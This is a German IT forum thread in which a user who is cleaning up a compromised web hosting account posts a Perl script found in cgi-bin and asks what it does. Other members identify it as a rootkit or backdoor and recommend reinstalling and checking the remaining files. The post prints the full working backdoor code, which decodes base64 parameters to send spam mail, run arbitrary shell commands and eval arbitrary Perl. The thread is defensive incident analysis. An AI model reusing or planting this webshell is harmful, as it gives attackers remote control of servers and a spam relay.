Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Analyse von Schadcode auf Webspace

Frage Sicherheit Erkennung und -Abwehr

Mitglied: mercuric

mercuric (Level 1) - Jetzt verbinden

16.07.2014, aktualisiert 22:09 Uhr, 1322 Aufrufe, 6 Kommentare

Moin,
ich habe gerade die Anfrage bekommen mir einen Webspace anzusehen, dessen Betreiber ein Abuse-Warning vom Provider bekommen hat.
Ich habe im Webverzeichnis unter /www/cgi-bin/ die Datei debris.pl mit folgenden Inhalt gefunden
(hab es leider nicht vernünftig formatiert bekommen)

01.
#!/usr/bin/perl -w 
02.
use strict;sub b ($) {local($^W)=0;use integer;my $s=shift;$s=~tr|A-Za-z0-9+=/||cd;return "" if length($s) % 4;$s=~s/=+$//;$s=~tr|A-Za-z0-9+/| -_|;return "" if !length $s;my $u="";my($i,$l);$l=length($s)-60;for($i=0;$i<=$l;$i+=60){$u.="M".substr($s,$i,60);}$s=substr($s,$i);if($s ne ""){$u.=chr(32+length($s)*3/4).$s;}return unpack("u",$u);}sub m {my $r=30128+256;my $q={};my $s="";if($ENV{REQUEST_METHOD} eq "GET"){$s=$ENV{QUERY_STRING};}else{my $l=$ENV{CONTENT_LENGTH};exit unless $l;while($l > length $s){my $v=length $s;sysread(STDIN,$s,($l-$v),$v);}}foreach(split(/&/,$s)){my($k,$v)=split(/=/,$_,2);next if !defined $k || !length $k;$v="" if !defined $v;$v=~tr/+/ /;$v=~s/%([0-9A-Fa-f]{2})/chr(hex($1))/esg;$q->{$k}=$v;}print "Content-type: text/html; charset=iso-8859-1\x0D\x0A\x0D\x0A";if($q->{m}==0){print $r;exit;}if($q->{m}==1){if(open(M,"| /usr/sbin/sendmail -t > /dev/null")){print M sprintf("To: %s\x0D\x0ASubject: %s\x0D\x0A%s",&b($q->{a}),&b($q->{b}),&b($q->{c}));close M;print $r;}exit;}if($q->{m}==2){use IPC::Open2 qw(open2);local $SIG{PIPE}=sub {exit};my($o,$i);my $p=open2 $o,$i,&b($q->{a});print $i &b($q->{b});close $i;print while(<$o>);close $o;waitpid($p,0);exit;}if($q->{m}==3){eval(&b($q->{a}));exit;}}&m();
Hab jetzt noch nicht so viele Perl Skripte gesehen, aber es sieht für mich aus, als würden damit (Spam)-Mails verschickt.
Liege ich da mit richtig? Kann mir noch jemand mehr dazu sagen?
In den Logfiles ist zu sehen, dass auf die Datei regelmäßig von IP-Adressen aus verschieden Ländern zugegriffen wurde.
Würdet Ihr sagen, dass es reicht das Skript zu entfernen (und natürlich alles Login Daten zu ändern) oder gibt es in dem Code Hinweise, dass es noch mehr korrupte Files gibt?

Vielen Dank für eure Mühe
mercuric
Mitglied: colinardo
LÖSUNG 16.07.2014, aktualisiert um 22:09 Uhr
Hallo mercuric,
da haben die sich ein Rootkit eingefangen. Hatte vor ein paar Tagen ein ähnliches System das komplett kompromittiert war (OpenSSH Sicherheitslücke). Bei diesem System wurden diverse Veränderungen vorgenommen um den Server auch nach einem Reboot immer wieder zu infizieren.

Neuinstallation ist in diesem Fall unbedingt anzuraten !

Hier noch ein Link dazu:
http://security.stackexchange.com/questions/10202/perl-script-rootkit-e ...

Wenn es ein Managed Server ist, ist vermutlich nur die Seite bzw. das CMS infiziert. Hier sind dann sämtliche Seiten auf Veränderungen zu überprüfen, oder auch dieses neu einzuspielen.

Grüße Uwe
Bitte warten ..
Mitglied: mercuric
16.07.2014 um 21:48 Uhr
Vielen Dank für deine schnelle Antwort, dass ja schon mal sehr spannend.
Es handelt sich lediglich um Webspace, sprich FTP, MySQL und Mail Zugang nicht um einen Root-Server (1blu-Homepage Professional).
Auf dem Space liegen nur reine HTML-Files, die auf dem ersten Blick sauber aussehen und Images/PDFs.
Ist es auch möglich so einem abgeschotteten System weiter zu kompromittieren?
Bitte warten ..
Mitglied: colinardo
16.07.2014, aktualisiert um 22:12 Uhr
Wenn nicht alle Sicherheitspatches eingespielt wurden oder eine Erweiterung des Hosters Sicherheitslücken aufweist, kann das schon mal sein, zwar selten, aber nicht unmöglich. Checke trotzdem alle Seiten auch auf komprimiertes JavaScript.
http://www.administrator.de/forum/opera-browser-warnung-vor-einer-b&oum ...
Bitte warten ..
Mitglied: certifiedit.net
16.07.2014 um 22:11 Uhr
..und kontaktiere den Hoster.
Bitte warten ..
Mitglied: LordGurke
17.07.2014 um 21:06 Uhr
Eine aktuelle OpenSSH-Lücke? Finde da gerade nichts halbwegs aktuelles...
Hast du da Details für mich?
Bitte warten ..
Mitglied: colinardo
17.07.2014, aktualisiert um 21:09 Uhr
Zitat von LordGurke:

Eine aktuelle OpenSSH-Lücke? Finde da gerade nichts halbwegs aktuelles...
Hast du da Details für mich?
hab nicht gesagt das die aktuell war der Betreiber hat das betroffene System ziemlich vernachlässigt...
Bitte warten ..
Neuester Wissensbeitrag
Windows 10

Powershell 5 BSOD

(1)

Tipp von agowa338 zum Thema Windows 10 ...

Ähnliche Inhalte
Microsoft Office
Fahrer Analyse Tabelle (Palletenzeit pro, min.) in EXCEL13 (3)

Frage von kluthi69 zum Thema Microsoft Office ...

Hosting & Housing
Webspace mit eigenem Zertifikat (7)

Frage von tingel zum Thema Hosting & Housing ...

Entwicklung
Eine Analyse-csv via Powershell in Sharepoint exportieren? (2)

Frage von Scuzzy zum Thema Entwicklung ...

Windows Server
gelöst Unterstützung bei der Analyse - langsamer SQL Zugriff (6)

Frage von Sachellen zum Thema Windows Server ...

Heiß diskutierte Inhalte
Windows Userverwaltung
Ausgeschiedene Mitarbeiter im Unternehmen - was tun mit den AD Konten? (34)

Frage von patz223 zum Thema Windows Userverwaltung ...

LAN, WAN, Wireless
gelöst Server erkennt Client nicht wenn er ausserhalb des DHCP Pools liegt (28)

Frage von Mar-west zum Thema LAN, WAN, Wireless ...

Windows Server
Server 2008R2 startet nicht mehr (Bad Patch 0xa) (18)

Frage von Haures zum Thema Windows Server ...